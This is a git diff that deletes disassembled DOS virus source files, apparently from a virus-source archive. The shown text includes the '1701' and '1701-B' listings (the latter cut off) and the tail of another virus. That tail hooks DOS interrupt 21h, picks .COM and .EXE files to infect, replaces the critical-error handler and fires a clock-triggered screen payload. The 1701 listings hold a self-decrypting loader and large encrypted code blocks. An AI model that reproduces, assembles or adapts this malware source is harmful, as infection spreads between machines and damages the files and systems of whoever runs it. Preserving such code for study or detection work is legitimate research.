loc_21 ; Jump if not equal - call sub_8 - iret ; Interrupt return -loc_21: - cmp ah,12h - jne loc_22 ; Jump if not equal - call sub_11 - iret ; Interrupt return -loc_22: - jmp dword ptr cs:data_17 - -; -; SUBROUTINE -; - -sub_8 proc near - mov al,57h ; 'W' - int 21h ; DOS Services ah=function 00h - ; terminate, cs=progm seg prefx - push ax - push cx - push dx - push bx - push bp - push si - push di - push ds - push es - push cs - pop ds - push cs - pop es - mov byte ptr cs:data_47,0 - nop - call sub_9 - jnz loc_23 ; Jump if not zero - call sub_3 - jz loc_23 ; Jump if zero - call sub_16 - dec data_47 -loc_23: - pop es - pop ds - pop di - pop si - pop bp - pop bx - pop dx - pop cx - pop ax - retn -sub_8 endp - - -; -; SUBROUTINE -; - -sub_9 proc near - push cs - pop es - push cs - pop es - cld ; Clear direction - call sub_10 - jnc loc_24 ; Jump if carry=0 - cmp di,0 - retn -loc_24: - mov di,offset data_44 ; ('A:MIO.COM') - mov al,2Eh ; '.' - mov cx,0Bh - repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al - cmp word ptr [di],4F43h - jne loc_25 ; Jump if not equal - cmp byte ptr [di+2],4Dh ; 'M' - jne loc_25 ; Jump if not equal - mov byte ptr data_53,43h ; 'C' - nop - retn -loc_25: - cmp word ptr [di],5845h - jne loc_ret_26 ; Jump if not equal - cmp byte ptr [di+2],45h ; 'E' - jne loc_ret_26 ; Jump if not equal - mov byte ptr data_53,45h ; 'E' - nop - -loc_ret_26: - retn -sub_9 endp - - -; -; SUBROUTINE -; - -sub_10 proc near -loc_27: - push ds - mov si,cs:data_34 - mov ax,cs:data_35 - mov ds,ax - mov di,offset data_44 ; ('A:MIO.COM') - lodsb ; String [si] to al - cmp al,0FFh - jne loc_28 ; Jump if not equal - add si,6 - lodsb ; String [si] to al - jmp short loc_29 - db 90h -loc_28: - cmp al,5 - jb loc_29 ; Jump if below - pop ds - stc ; Set carry flag - retn -loc_29: - mov cx,0Bh - cmp al,0 - je locloop_30 ; Jump if equal - add al,40h ; '@' - stosb ; Store al to es:[di] - mov al,3Ah ; ':' - stosb ; Store al to es:[di] - -locloop_30: - lodsb ; String [si] to al - cmp al,20h ; ' ' - je loc_31 ; Jump if equal - stosb ; Store al to es:[di] - jmp short loc_32 - db 90h -loc_31: - cmp byte ptr es:[di-1],2Eh ; '.' - je loc_32 ; Jump if equal - mov al,2Eh ; '.' - stosb ; Store al to es:[di] -loc_32: - loop locloop_30 ; Loop if cx > 0 - - mov al,0 - stosb ; Store al to es:[di] - pop ds - clc ; Clear carry flag - retn -sub_10 endp - - -; -; SUBROUTINE -; - -sub_11 proc near - mov al,57h ; 'W' - int 21h ; DOS Services ah=function 00h - ; terminate, cs=progm seg prefx - push ax - push cx - push dx - push bx - push bp - push si - push di - push ds - push es - push cs - pop ds - push cs - pop es - cmp byte ptr cs:data_47,0 - je loc_33 ; Jump if equal - jmp short loc_34 - db 90h -loc_33: - call sub_9 - jnz loc_34 ; Jump if not zero - call sub_3 - jz loc_34 ; Jump if zero - call sub_16 - dec data_47 - pop es - pop ds - pop di - pop si - pop bp - pop bx - pop dx - pop cx - pop ax - retn -loc_34: - pop es - pop ds - pop di - pop si - pop bp - pop bx - pop dx - pop cx - pop ax - retn -sub_11 endp - -data_47 db 0 - -; -; SUBROUTINE -; - -sub_12 proc near - push ax - push ds - pop ax - mov cs:data_35,ax - mov cs:data_34,dx - pop ax - retn -sub_12 endp - - -; -; SUBROUTINE -; - -sub_13 proc near - push cs - mov al,0 - out 20h,al ; port 20h, 8259-1 int command - mov ax,3524h - int 21h ; DOS Services ah=function 35h - ; get intrpt vector al in es:bx - mov data_40,bx - mov bx,es - mov data_39,bx - pop es - mov si,offset data_43 - mov di,offset data_44 ; ('A:MIO.COM') - mov cx,0Fh - -locloop_35: - lodsb ; String [si] to al - add al,20h ; ' ' - stosb ; Store al to es:[di] - loop locloop_35 ; Loop if cx > 0 - - retn -sub_13 endp - - -; -; SUBROUTINE -; - -sub_14 proc near - push ax - push cs - pop ds - push cs - pop es - mov bl,data_41 - cmp bl,0Ch - ja loc_37 ; Jump if above - cmp bl,0 - je loc_37 ; Jump if equal - mov al,8 - out 70h,al ; port 70h, RTC addr/enabl NMI - ; al = 8, month register - in al,71h ; port 71h, RTC clock/RAM data - cmp al,0Ch - ja loc_37 ; Jump if above - cmp al,0 - je loc_37 ; Jump if equal - cmp al,bl - je loc_37 ; Jump if equal - inc bl - call sub_15 - cmp al,bl - je loc_37 ; Jump if equal - inc bl - call sub_15 - cmp al,bl - je loc_37 ; Jump if equal - pop ds - call sub_17 - push cs - pop ds - retn - -; External Entry into Subroutine - -sub_15: - cmp bl,0Ch - jbe loc_ret_36 ; Jump if below or = - sub bl,0Ch - -loc_ret_36: - retn -loc_37: - pop ax - retn -sub_14 endp - - -; -; SUBROUTINE -; - -sub_16 proc near - mov dx,offset int_24h_entry - mov ax,2524h - int 21h ; DOS Services ah=function 25h - ; set intrpt vector al to ds:dx - cmp byte ptr data_53,43h ; 'C' - jne loc_38 ; Jump if not equal - call sub_4 - jmp short loc_39 - db 90h -loc_38: - call sub_5 -loc_39: - push ds - mov dx,data_40 - mov ax,data_39 - mov ds,ax - mov ax,2524h - int 21h ; DOS Services ah=function 25h - ; set intrpt vector al to ds:dx - pop ds - retn -sub_16 endp - - -; -; -; External Entry Point -; -; - -int_24h_entry proc far - mov al,3 - iret ; Interrupt return -int_24h_entry endp - - -; -; SUBROUTINE -; - -sub_17 proc near -;* mov dx,offset loc_47 ;* - db 0BAh,0B0h, 06h - mov ax,251Ch - int 21h ; DOS Services ah=function 25h - ; set intrpt vector al to ds:dx - mov byte ptr ds:data_56e,90h - nop - mov ax,0B800h - mov es,ax - mov di,data_55e - mov ax,720h - mov cx,0Bh - repne stosw ; Rep zf=0+cx >0 Store ax to es:[di] - push cs - pop es - retn -sub_17 endp - - db 0, 0 -data_48 db 0 -data_49 dw 720h -data_50 db 0Fh - db 0Ah, 0Fh, 0Ah, 0Fh, 0Ah, 0Fh - db 0Ah, 0Fh, 0Ah, 0Fh, 0Ah, 0Fh - db 0Ah, 0Fh, 08h,0FEh, 0Eh -data_51 db 0EEh - db 0Ch -data_52 db 90h - db 0FBh, 50h, 51h, 52h, 53h, 55h - db 56h, 57h, 1Eh, 06h, 0Eh, 1Fh - db 0EBh, 0Bh, 90h -loc_40: - pop es - pop ds - pop di - pop si - pop bp - pop bx - pop dx - pop cx - pop ax - iret ; Interrupt return - db 0B8h, 00h,0B8h, 8Eh,0C0h - db 0BFh,0A0h, 0Fh - db 0BEh, 9Ah, 06h,0B9h, 16h, 00h - db 0F2h,0A4h, 80h, 3Eh,0AEh, 06h - db 0EEh, 74h, 08h,0C6h, 06h,0AEh - db 06h,0EEh,0EBh, 06h, 90h -loc_42: - mov data_51,0F0h -loc_43: - mov ax,es:[di] - mov ah,0Eh - mov data_49,ax - mov data_48,0 - jmp short loc_40 - db 0BFh, 00h, 00h -loc_44: - mov si,offset data_50 - push di - mov cx,12h - cld ; Clear direction - repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to es:[di] - pop di - jz loc_45 ; Jump if zero - inc di - inc di - cmp di,0FA0h - jne loc_44 ; Jump if not equal - mov di,0 -loc_45: - cmp di,0F9Eh - jne loc_ret_46 ; Jump if not equal - mov data_52,0CFh - -loc_ret_46: - retn -data_53 db 43h - db 0Ch, 0Ah, 45h, 00h,0CBh, 87h - db 0BFh, 1Dh, 25h, 1Eh, 57h, 9Ah - db 83h, 00h,0CBh, 87h,0E8h - db 2Eh - -seg_a ends - - - - end start diff --git a/0-9/1701 (3).ASM b/0-9/1701 (3).ASM deleted file mode 100755 index 922e594..0000000 --- a/0-9/1701 (3).ASM +++ /dev/null @@ -1,427 +0,0 @@ - -PAGE 59,132 - -; -; -; 1701 -; -; Created: 11-Feb-92 -; Passes: 5 Analysis Options on: none -; -; - -data_31e equ 27D1h ;* -data_36e equ 4CD6h ;* -data_39e equ 6950h ;* -data_45e equ 8848h ;* -data_50e equ 0BDF1h ;* -data_53e equ 0CBC7h ;* -data_55e equ 0EA36h ;* -data_58e equ 49F2h -data_59e equ 0B0E0h -data_60e equ 0BCF1h -data_61e equ 0EAEFh - -seg_a segment byte public - assume cs:seg_a, ds:seg_a - - - org 100h - -1701 proc far - -start: - jmp loc_2 - db 39 dup (0) -data_22 db 0 ; Data table (indexed access) - db 58 dup (0) -loc_2: - cli ; Disable interrupts - mov bp,sp - call sub_1 - -1701 endp - -; -; SUBROUTINE -; - -sub_1 proc near - pop bx - sub bx,131h - test cs:data_22[bx],1 - jz $+11h ; Jump if zero - lea si,[bx+14Dh] ; Load effective addr - mov sp,682h -loc_4: - xor [si],si - xor [si],sp - inc si - dec sp - jnz loc_4 ; Jump if not zero - db 8Eh,0EBh,0E5h,0BDh, 62h,0F6h - db 0F7h, 06h,0EFh,0EEh,0EEh, 2Fh - db 0C2h,0E6h,0E6h,0E2h,0B1h, 11h - db 0EEh, 02h, 6Ch,0F8h, 36h,0EAh - db 3Bh,0DCh,0E0h,0C3h,0C2h,0C6h - db 0E6h,0C2h - -locloop_5: - mov si,dx - push es - db 0F1h, 60h,0D4h,0ABh, 69h, 96h - db 0EEh,0EEh,0E2h, 0Bh, 06h,0DBh - db 0E2h - db 0E2h,0EEh,0EEh,0F2h,0FAh,0F6h - db 0F6h -loc_7: - db 0F2h,0F2h, 7Ah, 87h, 61h -loc_9: - test ah,[di-80h] - add byte ptr [bp+si-7171h],0F6h - jc loc_9 ; Jump if carry Set - div dl ; al, ah rem = ax/reg - db 0F2h,0EEh,0EEh,0E2h,0E3h, 1Bh - db 16h,0C2h - db 0C2h,0CEh - db 0CEh, 1Ah,0F2h,0F6h,0ADh, 73h - db 19h, 6Dh,0CFh,0ECh, 4Eh, 49h - db 92h,0C3h,0ECh, 47h, 49h,0A4h - db 0F3h,0D8h, 7Dh, 75h,0AAh,0EFh - db 4Dh,0E2h,0E3h,0C8h, 6Ch, 65h - db 0B8h,0EFh, 4Ch,0F0h,0F3h,0A5h - db 42h,0C2h, 3Fh, 2Fh, 56h, 3Dh - db 03h, 77h, 14h,0B9h,0FEh, 46h - db 3Eh, 0Eh,0C1h, 00h, 3Bh,0D3h - db 73h, 11h, 44h,0B7h, 97h,0E9h - db 94h,0F4h - db 19h,0F0h,0E9h,0DCh, 79h, 71h - db 0A0h,0F3h,0DCh, 31h, 61h, 90h - db 0C3h, 95h, 7Eh,0E3h,0F7h, 03h - db 0EFh, 79h, 31h,0ADh,0D8h, 7Bh - db 75h, 8Fh,0EFh,0CCh, 6Eh, 61h - db 85h,0E3h, 5Ah,0EEh, 1Eh, 7Ch - db 32h, 49h,0FEh, 12h, 73h,0B3h - db 0CDh,0CDh,0F7h, 9Dh, 07h,0FFh - db 80h,0DEh,0DCh, 87h,0E6h, 77h - db 8Bh,0F6h,0DCh -loc_14: - into ; Int 4 on overflow - db 9Bh,0EFh, 63h, 9Bh,0E0h,0ABh - db 0A0h, 9Bh,0E8h, 71h, 8Fh,0FEh - db 0BBh, 86h, 45h, 76h,0B5h,0C2h - db 4Eh, 0Bh, 8Bh, 4Ch, 07h,0E0h - db 45h,0C4h,0E4h,0F6h,0D0h, 7Bh - db 0C4h,0EFh,0EEh,0C4h, 69h,0F0h - db 0E5h,0E2h,0C4h, 4Dh,0EDh,0F2h - db 0D4h, 30h,0F0h,0F2h,0F2h, 43h - db 25h,0D2h, 48h, 43h, 05h,0EAh - db 47h, 80h,0CBh,0A1h, 46h,0A6h - db 7Dh, 2Fh, 3Fh,0CFh,0B5h,0D1h - db 1Dh,0E0h,0F1h,0B5h, 6Fh, 51h - db 20h,0F5h, 79h, 01h - db 4Fh - db 57h,0F4h, 33h, 3Dh, 66h,0C4h -loc_16: - dec bx - dec cx - mov dl,0C0h - lahf ; Load ah from flags - add ax,7EDCh - jns loc_14 ; Jump if not sign - db 0F3h, 7Fh, 61h,0C4h,0E3h, 11h - db 42h,0C8h, 6Eh,0ECh,0D8h,0EEh - db 0BFh, 7Ch, 33h,0D0h - db 7Bh,0E4h, 8Dh, 8Eh,0A4h, 44h - db 80h - db 86h, 82h,0D8h,0A8h, 02h,0FCh - db 0F3h -loc_19: - div byte ptr [bp+di+377Ch] ; al,ah rem = ax/data - lock jmp $-211h -sub_1 endp - - db 6Bh, 51h,0C8h,0E3h, 51h,0EEh - db 0F3h, 4Bh, 53h,0F0h, 0Eh, 01h - db 6Ah,0C8h, 4Fh,0C4h, 42h,0C4h - db 92h - db 9 - db 0E0h, 09h,0F4h,0DEh,0F6h,0F6h - db 0F2h,0DCh, 62h,0E0h,0F4h,0E2h - db 0F8h, 6Bh,0F4h,0FEh,0EDh,0E0h - db 0EDh, 4Ah,0D7h,0D3h, 3Fh,0D3h - db 11h,0BBh, 19h,0B9h, 87h, 07h - db 0CEh, 22h,0E7h,0FCh,0F2h, 46h - db 0DCh, 3Bh,0D3h, 73h, 17h, 2Ah - db 0E5h, 95h, 83h, 92h,0C8h, 63h - db 17h, 52h,0F5h, 87h,0ABh,0E8h - db 4Ah,0DAh,0FBh, 03h,0E3h,0ECh - db 4Fh,0D8h,0F9h,0C3h,0E0h - db 42h - db 0F4h,0CFh,0F7h, 4Eh,0DAh,0D7h - db 54h,0CCh,0E5h,0ECh,0F9h, 2Bh - db 0C3h,0FDh,0C0h, 6Eh,0FCh,0A5h - db 0F7h,0FEh, 19h,0F4h, 1Eh, 0Eh -loc_22: - jl loc_19 ; Jump if < - hlt ; Halt processor - mov dl,6Ah ; 'j' - dec word ptr ds:data_55e[si] - out 1Eh,ax ; port 1Eh ??I/O Non-standard - jc loc_22 ; Jump if carry Set - mov dl,0C0h - dec bp - mov sp,0C8E3h - inc bp - and bl,0C0h - sub sp,si - xchg ax,si - div di ; ax,dx rem=dx:ax/reg - db 0F2h, 4Ah,0D2h,0FBh, 0Fh,0E3h - db 0E8h, 4Fh,0DCh,0F1h,0CFh,0E0h - db 7Eh,0F4h - db 0C3h,0F7h,0ECh, 4Ah,0F2h,0CBh - db 58h, 5Fh,0E0h,0E8h,0FDh, 2Fh - db 0CFh,0F1h, 49h, 24h, 09h, 1Fh - db 65h, 0Ch, 8Eh,0F2h, 49h, 76h - db 16h, 28h,0FDh, 2Ch, 39h, 0Fh - db 4Dh, 58h,0A3h,0D8h, 36h,0F4h - db 0D9h,0EFh, 6Eh, 28h, 29h,0DAh - db 1Dh, 96h, 1Fh,0D2h,0F2h, 87h - db 1Eh, 6Ah,0A2h,0A1h, 9Fh, 9Ch - db 94h, 95h, 93h,0C0h,0DCh,0ECh - db 47h,0D8h,0B5h,0F3h,0D8h, 7Ah - db 0ECh,0BBh,0EFh,0E0h,0E5h, 5Ah - db 0E6h,0DBh, 2Fh,0C3h, 9Ch,0B8h - db 79h, 2Ah, 4Eh,0F6h,0A5h, 3Fh - db 0AFh,0A0h, 0Bh, 94h,0C5h, 87h - db 0ACh, 0Bh, 80h,0CBh,0F3h, 46h - db 0C9h,0F8h,0EDh, 48h,0C0h,0EFh - db 5Bh,0E1h,0E6h, 2Bh,0C3h, 90h - db 0D9h,0D5h, 33h, 87h,0C5h, 4Eh - db 0F0h,0B0h,0FDh, 07h,0F1h, 10h - db 0Bh,0E7h,0ECh, 61h, 85h - db 0CFh,0DCh, 7Bh,0E0h,0BBh,0F3h - db 46h,0D0h, 23h,0C3h,0CCh, 67h - db 0D8h,0CCh,0E3h,0A3h,0B4h, 87h - db 0F1h, 1Fh, 31h,0F2h,0DCh, 8Dh - db 37h, 48h, 04h, 01h, 76h, 0Ch - db 2Bh, 88h, 37h,0BEh,0F3h,0CDh - db 0Fh, 84h,0F1h, 07h, 5Dh,0E2h - db 0CCh, 66h,0D8h,0CCh,0E3h, 07h - db 9Bh,0FCh,0DCh - db 57h -loc_27: - mov bp,0F7F3h - xchg ax,di - aaa ; Ascii adjust - in al,dx ; port 0C0h, DMA-2 bas&add ch 0 - stc ; Set carry flag - db 0C0h,0E9h - db 0C3h,0B6h, 29h, 76h,0F2h,0B1h - db 0D8h, 33h,0E4h,0B5h,0EFh, 23h - db 0C3h, 90h, 3Dh,0C8h, 6Bh,0ECh - db 0AFh,0EFh, 72h, 03h,0D6h, 00h - db 33h,0D5h,0FAh, 87h, 3Ah, 83h - db 0C5h,0B5h, 4Bh, 4Fh,0AFh - db 0FCh, 37h, 4Ah,0F4h - db 0CBh, 3Fh,0D3h, 9Ch, 50h, 69h - db 3Ah, 5Eh,0E4h,0A0h,0D1h, 27h - db 0DDh, 20h, 3Fh,0D7h, 1Eh,0A2h - db 0F1h,0BDh,0D6h, 7Ah,0C2h, 84h - db 0E8h, 49h,0CCh, 83h,0CFh,0DCh - db 79h,0E0h,0BDh,0F3h, 3Fh,0CFh - db 5Ah,0A2h,0D1h, 2Fh, 2Bh,0C3h - db 09h,0CFh, 7Eh - db 4Ah,0F2h,0B4h,0C5h, 3Bh,0C1h - db 0DCh,0C3h, 23h, 70h, 13h, 28h - db 0A3h, 49h, 0Fh, 0Bh, 0Ch, 0Dh - db 0D8h, 55h,0A2h,0F3h, 5Ah,0AEh - db 58h,0ADh,0E7h, 5Fh,0E1h,0E2h - db 23h,0CFh, 4Ah,0F3h,0A1h,0D8h - db 79h,0E4h, 8Dh,0CFh,0ECh, 49h - db 0C8h, 83h,0C3h, 0Fh,0EFh, 7Ah - db 0CCh, 3Fh,0D7h,0D8h, 79h,0FCh - db 0AFh,0EFh, 14h, 23h,0E1h, 93h - db 0E7h, 14h, 2Fh,0CEh, 87h,0F8h - db 4Eh,0F7h,0B1h,0DCh, 4Bh, 98h - db 0C5h, 83h, 4Bh,0A7h, 9Dh, 85h - db 0D3h,0D1h,0ACh,0A8h,0AFh,0ADh - db 0AAh, 6Fh, 07h, 5Ch, 1Ch,0FCh - db 0E8h -loc_33: - stc ; Set carry flag - mov cl,0B3h - mov sp,4BBEh - cmc ; Complement carry - db 0F6h, 4Dh, 86h,0F3h, 31h,0F9h - db 49h, 85h, 38h,0D7h,0C5h, 89h - db 85h - db 2Ch, 05h,0AAh,0E7h,0F1h, 79h - db 0E5h,0B6h,0E5h, 22h, 96h,0E4h - db 11h, 00h, 69h, 2Ch,0B4h,0ABh - db 0A9h,0E9h, 35h,0ECh,0F4h, 58h - db 58h, 52h, 0Dh, 00h,0BEh, 43h - db 03h, 81h,0D6h, 4Ch, 94h,0F7h - db 48h, 9Eh,0F2h, 57h,0E6h,0E2h - db 1Eh, 15h, 43h,0BBh,0BDh,0B0h - db 0E9h,0EDh, 31h,0A0h,0E8h,0A0h - db 78h, 08h, 38h,0E4h, 90h,0C7h - db 70h,0C2h,0C1h - db 0Ch - db 1Fh, 12h,0F1h,0F0h,0ACh,0F3h - db 79h, 1Eh, 18h,0E4h,0B6h,0E7h - db 19h, 6Ch,0FCh,0B6h,0EFh, 86h - db 0E0h, 4Ch, 2Ch,0F1h, 08h, 62h - db 26h, 8Ah,0F7h, 8Fh, 2Eh, 83h - db 0F7h, 79h, 62h, 5Ah,0F3h, 82h - db 0Dh, 5Fh - db 09h,0B4h,0F1h,0BCh, 21h,0B1h - db 0E0h,0B0h,0B1h, 65h, 36h, 78h - db 34h, 00h,0D0h,0A0h,0F3h, 78h - db 0CEh,0C1h, 00h, 17h, 26h,0C1h - db 0C4h, 94h,0CFh, 79h, 0Ah, 00h - db 0F0h,0A6h,0F3h, 11h, 60h,0E4h - db 0BAh,0E7h, 92h,0F0h, 58h, 34h - db 0EDh, 08h, 1Eh, 5Eh,0FEh, 87h - db 0FBh,0A6h, 0Fh, 77h,0F5h,0EAh - db 0AEh, 03h, 76h,0F5h, 85h, 31h - db 58h, 0Dh,0ADh,0A8h,0F5h,0B1h - db 2Dh,0B3h,0B3h, 6Dh,0E8h,0BEh - db 0E3h, 0Ch, 10h,0ABh, 10h, 00h - db 0AFh, 31h,0A2h, 2Ah,0AFh,0F6h - db 0C0h,0E2h, 38h, 24h,0A3h, 96h - db 0Dh,0CEh,0F2h, 82h,0FCh,0CEh - db 0D2h, 9Ah,0E8h,0DEh, 1Dh, 92h - db 0E4h, 1Ah, 21h, 17h, 2Dh,0CEh - db 42h, 84h,0F0h,0CEh, 2Dh,0F9h - db 8Ch, 7Bh, 41h, 7Eh, 45h, 9Ch - db 3Ah,0CEh, 8Eh, 7Ch, 2Ah, 0Dh - db 57h, 9Eh,0F2h,0D5h,0E8h, 8Eh - db 0E2h, 92h, 1Ch,0D1h -loc_37: - sub cx,[bx-7Eh] - db 0F2h,0B3h, 82h,0E3h,0C9h,0F4h - db 0A2h,0CEh,0B6h, 35h,0D9h, 4Dh - db 03h,0F1h, 1Ch, 77h,0FDh,0F2h - db 01h, 07h,0DCh, 51h,0B2h,0EFh - db 21h,0ABh - db 0Dh, 08h - db 24h,0E4h - db 0BDh,0EFh,0EAh,0ECh, 4Eh,0B6h - db 0F2h, 7Ch,0D6h,0ACh, 4Fh, 01h - db 1Ah,0A6h, 5Bh, 00h,0BFh,0F2h - db 49h,0C2h,0E7h, 41h,0F2h,0F4h - db 0BBh, 23h,0F2h,0BFh,0E1h, 66h - db 18h, 1Dh, 9Ah,0EAh, 7Ah,0E4h - db 0A5h,0F7h, 46h,0FDh, 03h,0DEh - db 4Ah,0E4h, 94h,0C7h, 04h,0C4h - db 9Ah,0CFh,0F2h, 35h,0F0h,0AEh - db 0F3h,0F2h, 5Eh,0D2h,0E5h, 96h - db 0D0h, 94h - db 0E1h, 0Bh, 0Eh,0EEh, 35h,0F4h - db 0AEh,0F7h,0F2h, 4Ah,0B2h, 8Dh - db 0F5h - -locloop_40: - movsw ; Mov [si] to es:[di] -;* mov dx,offset loc_46 ;* - db 0BAh, 84h,0F0h - mov ax,ds:data_45e - cmpsb ; Cmp [si] to es:[di] - db 0F3h,0F7h, 56h,0A1h,0F3h, 10h - db 2Eh, 14h,0C4h,0B4h,0E7h, 41h - db 80h,0EFh, 4Fh, 96h,0F3h,0CDh - db 0F0h, 90h,0F3h,0B8h,0CDh, 63h - db 0A0h,0C7h, 2Eh,0A9h, 3Ch, 8Eh - db 45h, 02h,0C1h, 09h,0B1h, 53h - db 90h,0EFh, 3Fh, 02h,0D9h, 1Eh - db 90h,0E1h, 0Bh, 4Eh,0EEh, 72h - db 0FCh,0A1h,0F7h,0F0h, 52h, 5Ch - db 0Fh,0B6h, 02h,0EEh, 4Ah,0FCh - db 88h,0DEh,0AEh,0A1h,0F3h, 42h - db 0F6h, 1Ah,0B0h, 10h, 64h, 12h - db 0Ah, 60h, 18h, 0Ah,0F3h, 11h - db 9Ch, 20h, 1Ah,0EAh, 09h, 80h - db 3Fh, 6Ch, 9Bh,0C3h, 4Ah,0E0h - db 90h,0C3h, 48h,0C0h, 9Dh,0F3h - db 47h,0F6h, 08h, 34h,0C8h,0D8h - db 0BDh,0E3h, 95h,0B4h, 0Eh, 86h - db 1Ch,0D4h,0C8h,0A4h,0F3h, 83h - db 0BFh, 1Ah, 1Bh, 70h,0FCh,0AAh - db 6Ah, 72h, 78h,0F0h,0BDh, 70h - db 48h,0C8h,0C4h,0A5h,0F7h, 85h - db 0C5h, 06h,0A7h, 1Ch,0D8h,0C0h - db 0B0h,0E3h, 97h,0C0h, 06h, 3Ch - db 0Ch, 85h, 13h, 1Ah, 4Ch, 30h - db 30h, 0Ch, 2Ah,0F0h, 38h, 60h - db 97h,0CFh, 30h, 34h, 72h,0D0h - db 0A1h,0F3h, 0Fh, 10h, 20h, 52h - db 0C2h, 0Eh,0BBh, 1Ch, 1Ch, 28h - db 4Eh,0A7h,0F3h, 1Eh,0A3h, 0Ch - db 11h, 0Ah,0E7h, 8Dh,0FDh, 4Eh - db 0ECh,0A5h,0F5h, 09h, 58h,0F2h - db 0F0h, 82h,0F5h, 1Bh,0AEh, 11h - db 06h, 69h, 1Ch,0A8h, 92h,0E1h - db 0Bh,0BFh, 11h, 16h, 93h,0D2h - db 0Ah, 14h, 93h, 0Dh,0E0h, 34h - db 0C4h, 91h,0C7h,0CBh,0B7h, 96h - db 0E0h, 72h,0FCh,0A1h,0F7h,0F3h - db 0DCh, 11h,0E0h,0BCh,0E3h, 93h - db 0A3h,0FCh - -locloop_41: - in al,0E0h ; port 0E0h, Memory encode reg2 - db 0F1h,0FCh,0F5h,0A6h,0A5h,0A3h - db 0A0h,0D8h,0D9h,0D7h, 32h,0A6h - db 60h,0A2h, 23h,0EEh, 8Fh,0CFh - db 0CAh,0F2h, 85h,0F1h, 4Ah,0D6h - db 0EAh, 0Ah, 9Ch, 1Bh,0A6h, 41h - db 0BCh,0EFh, 4Dh, 92h,0F3h, 1Eh - db 61h, 0Ch, 4Ah,0CDh,0CEh, 2Ah - db 0ACh, 3Bh, 86h, 35h,0E4h,0AAh - db 0CFh, 81h,0F1h, 4Eh, 09h, 0Dh - db 51h, 8Ah,0EFh,0BFh,0BDh,0B8h - db 0BCh,0BBh,0B9h,0B6h,0E9h,0EDh - db 0DCh, 76h,0D0h,0A5h,0F3h,0F0h - db 20h,0FDh, 2Ch, 35h, 07h, 2Ch - db 0F4h, 08h, 59h,0F3h,0FAh, 82h - db 0EBh,0A2h,0A3h,0BCh, 5Ah,0C8h - db 2Fh,0C7h, 67h, 1Bh, 26h,0E9h - db 9Ch,0FFh, 85h,0F3h - -locloop_42: - jbe loc_45 ; Jump if below or = - clc ; Clear carry flag - mov sp,0ECC8h - inc dx - loopnz locloop_41 ; Loop if zf=0, cx>0 - - retn - db 35h, 94h - db 97h - db 0AAh -loc_45: - esc 4,[bx+di] ; coprocessor escape - esc 0,cl ; coprocessor escape - db 0F3h,0E8h,0BDh, 56h,0AAh, 5Dh - db 8Dh,0E2h, 2Fh,0CFh,0B5h, 81h - db 0F1h, 0Fh,0F1h, 31h,0DCh, 48h - db 88h, 82h, 83h, 87h, 08h, 42h - db 8Ch, 91h,0BDh, 0Dh, 4Ch,0F6h - db 0F7h, 4Bh, 57h,0E8h, 12h, 11h - db 46h, 59h,0C5h,0E2h, 5Ch,0CDh - db 0EFh,0F1h,0C4h,0BDh,0F7h, 4Bh - db 70h,0C8h,0E8h,0F3h,0F7h,0E0h - db 0F7h,0CFh, 85h, 88h, 2Ch, 04h - db 7Ch, 2Eh, 42h,0B2h,0C1h, 3Ch - db 57h, 47h,0E4h, 2Bh,0C7h, 7Eh - db 0B2h, 5Ah,0A7h, 3Fh,0D3h,0AEh - db 6Bh,0FCh,0EDh, 7Ch,0BBh, 36h - db 0CCh, 7Ch,0BFh, 0Ah,0F5h,0C2h - -seg_a ends - - - - end start diff --git a/0-9/1701-B (4).ASM b/0-9/1701-B (4).ASM deleted file mode 100755 index c302c84..0000000 --- a/0-9/1701-B (4).ASM +++ /dev/null @@ -1,424 +0,0 @@ - -PAGE 59,132 - -; -; -; 1701-B -; -; Created: 11-Feb-92 -; Passes: 5 Analysis Options on: none -; -; - -data_31e equ 27D1h ;* -data_36e equ 4CD6h ;* -data_39e equ 6950h ;* -data_45e equ 8848h ;* -data_50e equ 0BDF1h ;* -data_53e equ 0CBC7h ;* -data_56e equ 0EA36h ;* -data_59e equ 49F2h -data_60e equ 0B0E0h -data_61e equ 0BCF1h -data_62e equ 0EAEFh - -seg_a segment byte public - assume cs:seg_a, ds:seg_a - - - org 100h - -1701-b proc far - -start: - jmp loc_3 - db 39 dup (0) -data_22 db 0 ; Data table (indexed access) - db 30 dup (0) - db 28 dup (0) -loc_3: - cli ; Disable interrupts - mov bp,sp - call sub_1 - -1701-b endp - -; -; SUBROUTINE -; - -sub_1 proc near - pop bx - sub bx,131h - test cs:data_22[bx],1 - jz $+11h ; Jump if zero - lea si,[bx+14Dh] ; Load effective addr - mov sp,682h -loc_5: - xor [si],si - xor [si],sp - inc si - dec sp - jnz loc_5 ; Jump if not zero - db 8Eh,0EBh,0E5h,0BDh, 62h,0F6h - db 0F7h, 06h,0EFh,0EEh,0EEh, 2Fh - db 0C2h,0E6h,0E6h,0E2h,0B1h, 11h - db 0EEh, 02h, 6Ch,0F8h, 36h,0EAh - db 0B7h,0DAh,0D0h,0C0h,0C2h,0C6h - db 0E6h,0C2h - -locloop_6: - mov si,dx - xchg dh,bh - db 60h,0D4h,0ABh, 69h, 96h,0EEh - db 0EEh,0E2h, 0Bh,0A0h,0EFh,0E2h - db 0E2h,0EEh,0EEh,0F2h,0FAh,0F6h - db 0F6h -loc_8: - db 0F2h,0F2h, 30h, 8Ch,0FEh, 8Bh - db 0FAh, 8Fh, 82h, 82h, 8Fh, 8Eh - db 0B9h, 45h,0F6h,0F6h,0F2h,0F2h - db 0EEh,0EEh,0E2h,0E3h, 1Bh, 16h - db 0C2h - db 0C2h,0CEh - db 0CEh, 1Ah,0F2h,0F6h,0ADh, 73h - db 19h, 6Dh,0CFh,0ECh, 4Eh, 49h - db 92h,0C3h,0ECh, 47h, 49h,0A4h - db 0F3h,0D8h, 7Dh, 75h,0AAh,0EFh - db 4Dh,0E2h,0E3h,0C8h, 6Ch, 65h - db 0B8h,0EFh, 4Ch,0F0h,0F3h,0A5h - db 42h,0C2h, 3Fh, 2Fh, 56h, 3Dh - db 03h, 77h, 14h,0B9h,0FEh, 46h - db 3Eh, 0Eh,0C1h, 00h, 3Bh,0D3h - db 73h, 11h, 44h,0B7h, 97h,0E9h - db 94h,0F4h - db 19h,0F0h,0E9h,0DCh, 79h, 71h - db 0A0h,0F3h,0DCh, 31h, 61h, 90h - db 0C3h, 95h, 7Eh,0E3h,0F7h, 03h - db 0EFh, 79h, 31h,0ADh,0D8h, 7Bh - db 75h, 8Fh,0EFh,0CCh, 6Eh, 61h - db 85h,0E3h, 5Ah,0EEh, 1Eh, 7Ch - db 32h, 49h,0FEh, 12h, 73h,0B3h - db 0CDh,0CDh,0F7h, 